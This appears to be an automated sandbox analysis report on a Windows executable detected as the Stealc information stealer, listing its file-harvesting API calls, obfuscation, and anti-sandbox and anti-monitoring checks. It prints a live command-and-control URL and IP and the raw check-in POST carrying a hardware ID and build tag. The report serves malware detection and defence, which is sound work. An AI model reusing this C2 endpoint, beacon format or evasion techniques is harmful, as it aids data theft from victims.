Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009238B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00924910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0091E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0091ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00924570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00923EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009116D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00914880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/G
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C260C7	0_2_00C260C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8	0_2_00CE29D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDD9A4	0_2_00CDD9A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9C936	0_2_00B9C936
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDF96C	0_2_00CDF96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB397A	0_2_00BB397A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C60115	0_2_00C60115
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2A927	0_2_00C2A927
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE4AAA	0_2_00CE4AAA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94BE1	0_2_00B94BE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6248D	0_2_00C6248D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDA476	0_2_00CDA476
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA8D08	0_2_00BA8D08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE0E93	0_2_00CE0E93
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5EEA2	0_2_00D5EEA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8860C	0_2_00B8860C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3E4A	0_2_00BF3E4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C10F57	0_2_00C10F57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDBF1E	0_2_00CDBF1E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 009145C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: enilkfvu ZLIB complexity 0.9950591473636087

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00928680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00923720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VQR1X6ZM.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1836032 > 1048576

Source: file.exe

Static PE information: Raw size of enilkfvu is bigger than: 0x100000 < 0x19a200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00929860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c2667 should be: 0x1c4d05

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: enilkfvu
Source: file.exe	Static PE information: section name: cjtkqast
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C260C7 push 0108C592h; mov dword ptr [esp], esi	0_2_00C26316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCE8D9 push esi; mov dword ptr [esp], ebx	0_2_00DCE90F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC18C4 push eax; mov dword ptr [esp], ecx	0_2_00DC18DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push esi; mov dword ptr [esp], ebx	0_2_00BE3180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push edi; mov dword ptr [esp], esi	0_2_00BE3184
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push ebp; mov dword ptr [esp], ecx	0_2_00BE31B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9D848 push ebp; mov dword ptr [esp], 53967580h	0_2_00D9D8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092B035 push ecx; ret	0_2_0092B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCB06C push 52FB224Ch; mov dword ptr [esp], edx	0_2_00DCB0DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFD03D push esi; mov dword ptr [esp], 1F9A9466h	0_2_00DFD0DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7683E push ecx; mov dword ptr [esp], edx	0_2_00D7686F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push 192B211Ch; mov dword ptr [esp], ecx	0_2_00DEB03F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push ebx; mov dword ptr [esp], ebp	0_2_00DEB17E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push eax; mov dword ptr [esp], esi	0_2_00DEB1B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push 7B17890Dh; mov dword ptr [esp], eax	0_2_00DEB1E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push esi; mov dword ptr [esp], esp	0_2_00DEB1E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push edi; mov dword ptr [esp], esp	0_2_00D7807A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push 435E7A54h; mov dword ptr [esp], ecx	0_2_00D7813B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push edi; mov dword ptr [esp], edx	0_2_00D7817D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC1C8 push 12D63B6Ah; mov dword ptr [esp], edi	0_2_00CEC1F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC1C8 push 5765917Fh; mov dword ptr [esp], esi	0_2_00CEC275
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEA9D5 push ebx; mov dword ptr [esp], ecx	0_2_00DEAA1A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 24F38F98h; mov dword ptr [esp], ebp	0_2_00CE29FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push ecx; mov dword ptr [esp], 377D5128h	0_2_00CE2A01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edi	0_2_00CE2A89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], ebx	0_2_00CE2B27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 0B20A511h; mov dword ptr [esp], esi	0_2_00CE2B68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edx	0_2_00CE2C02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 2DA0F3D7h; mov dword ptr [esp], eax	0_2_00CE2C86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 5F6B3B2Dh; mov dword ptr [esp], esi	0_2_00CE2CA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 662C787Ah; mov dword ptr [esp], edx	0_2_00CE2CE1

Source: file.exe

Static PE information: section name: enilkfvu entropy: 7.954611061577171

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00929860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD530 second address: CDD534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD534 second address: CDD547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jno 00007F1674F90E16h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD547 second address: CDD564 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DACh 0x00000008 pushad 0x00000009 jl 00007F1675279DA6h 0x0000000f jns 00007F1675279DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFBE second address: CEBFC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFC4 second address: CEBFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFCA second address: CEBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC173 second address: CEC185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC185 second address: CEC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEAFB second address: CEEB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEB0F second address: CEEB7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 35D15B89h 0x00000010 mov dword ptr [ebp+122D347Ch], esi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1674F90E18h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 add ecx, 2D153BBAh 0x00000038 movzx ecx, bx 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D1963h], ebx 0x00000043 push 00000003h 0x00000045 jl 00007F1674F90E1Ch 0x0000004b mov dword ptr [ebp+122D1904h], ecx 0x00000051 push E3AD49C1h 0x00000056 js 00007F1674F90E20h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC2B second address: CEEC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1675279DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC35 second address: CEEC96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F1674F90E18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov si, 87F0h 0x0000002c push 00000000h 0x0000002e jmp 00007F1674F90E25h 0x00000033 push C52C45DCh 0x00000038 pushad 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC96 second address: CEEC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC9A second address: CEECFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3AD3BAA4h 0x0000000e add edx, 79098B00h 0x00000014 mov dword ptr [ebp+122D1BA9h], ebx 0x0000001a push 00000003h 0x0000001c movsx edx, dx 0x0000001f push 00000000h 0x00000021 jno 00007F1674F90E1Bh 0x00000027 add cx, 79EEh 0x0000002c mov dx, cx 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1674F90E18h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ECE973F1h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEECFA second address: CEED04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEED8C second address: CEEE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1674F90E1Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D1D0Dh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1674F90E18h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push B039E4F8h 0x00000035 pushad 0x00000036 jmp 00007F1674F90E27h 0x0000003b jng 00007F1674F90E29h 0x00000041 jmp 00007F1674F90E23h 0x00000046 popad 0x00000047 add dword ptr [esp], 4FC61B88h 0x0000004e jmp 00007F1674F90E21h 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 mov ch, dh 0x00000059 push 00000003h 0x0000005b mov edx, 2084BF74h 0x00000060 call 00007F1674F90E19h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEE33 second address: CEEE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEE44 second address: CEEEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E20h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F1674F90E25h 0x00000018 jmp 00007F1674F90E1Ch 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 jmp 00007F1674F90E25h 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEA1 second address: CEEEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEAF second address: CEEEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEB3 second address: CEEEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEB9 second address: CEEF5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e jng 00007F1674F90E18h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F1674F90E18h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 ja 00007F1674F90E29h 0x00000038 lea ebx, dword ptr [ebp+124509D3h] 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1674F90E18h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 movzx edi, ax 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007F1674F90E26h 0x00000063 pop eax 0x00000064 pushad 0x00000065 push esi 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
